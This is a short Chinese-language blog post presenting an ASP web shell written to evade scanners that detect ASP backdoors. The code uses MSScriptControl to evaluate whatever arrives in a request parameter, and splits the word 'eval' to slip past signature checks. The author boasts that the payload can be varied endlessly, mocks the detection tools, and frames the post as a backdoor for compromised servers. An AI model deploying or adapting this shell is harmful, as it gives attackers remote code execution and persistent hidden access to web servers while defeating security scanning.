那个饶过那个什么什么的来着

作者:sobiny [b.c.t]
来源:http://sobiny.cn

今天在LCX牛牛的BLOG上看到了一个新的绕过那个什么查ASP 马的东西。。

怎么说呢,其实如果单说写文件到服务器上来留后门的话。
可能大概也只有10多种方法吧可以绕过吧。

但是像这种可以直接执行的,好象还少着。。

既然他们都公布得愉快。
我也发一个我觉得拿得出手的吧。
等着那些检测程序加入新的特征吧,啊哈哈。

<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""aaaa""))")
%>

大家其实也都看得出来,ExecuteStatement里面的东西可以无限变形。。
其实这里面需要的东西,我都给出了。
不过我不太喜欢把细节完全公开。
我把饭给你准备好了,你不会还要我给你喂吧?

最后要说的话:
ASP,其实不仅仅是ASP。

相关日志

发表评论